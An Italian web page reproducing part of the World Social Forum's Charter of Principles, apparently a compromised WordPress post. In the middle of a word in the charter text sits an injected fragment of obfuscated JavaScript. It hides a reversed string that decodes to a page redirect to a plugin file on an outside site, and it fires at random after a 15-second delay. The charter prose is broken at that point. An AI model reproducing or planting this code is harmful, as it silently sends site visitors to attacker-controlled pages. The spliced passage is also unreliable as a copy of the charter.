La Carta di Porto Alegre

image_pdfimage_print

Il Forum Sociale Mondiale è uno spazio aperto di incontro per la riflessione, il dibattito democratico di idee, la formulazione di proposte, il libero scambio di esperienze e il coordinamento per l’azione di gruppi e movimenti della società civile che si oppongono al neoliberismo, alla dominazione del mondo da parte del capitale e a ogni forma di imperialismo, e che sono impegnate a costruire una società planetaria finalizzata a relazioni fruttuose fra gli esseri umani, e fra gli esseri umani e la terra. Le alternative proposte sono pensate per assicurare che la globalizzazione solidale prevalga come nuova fase della storia del mondo, nel rispetto dei diritti umani universali e dei diritti di tutti i cittadini, uomini e donne, di tutte le nazioni e dell’ambiente, fondata su un sistema internazionale democratico e su istituzioni al servizio della giustizia sociale, dell’uguaglianza e della sovranità dei popoli. Il Forum Sociale Mondiale fa incontrare e mette in collegamento organizzazioni e movimenti della società civile di tutti i paesi del mondo, ma non intende essere un organismo rappresentativo della società civile mondiale. Il Forum Sociale Mondiale è un contesto plurale, diversificato, non confessionale, non governativo e non partitico che, in modo decentralizzato, collega organizzazioni e movimenti impegnati in azioni concrete dal livello locale a quello internazionale per costruire un altro mondo. Il Forum Sociale Mondiale sarà sempre un forum aperto al pluralismo e alla diversità delle attività e delle modalità di impegno delle organizzazioni e dei movimenti che decidono di partecipare in esso. Il Forum Sociale Mondiale, come ambito per lo scambio di esperienze, incoraggia la comprensione e il reciproco riconoscimento fra i movimenti e le organizzazioni partecipanti, e pone un valore particolare nello scambio fra esperienze, in particolare quelle che la società sta costruendo affinché l’attività economica e l’azione politica incontrino i bisogni dei popoli e il rispetto della natura, nelle generazioni presenti e future. Il Forum Sociale Mondiale è un processo che incoraggia i movimenti e le organizzazioni partecipanti a collocare la loro azione, dal livello locale a quello nazionale e realizz (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando attiva partecipazione nel contesto internazionale, come questione di cittadinanza planetaria e a introdurre nell’agenda globale le pratiche di cambiamento che essi stanno sperimentando per costruire un nuovo mondo in solidarietà. Per leggerla integralmente visitate il sito alla pagina: http://www.fse-esf.org/article.php3?id_article=59

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *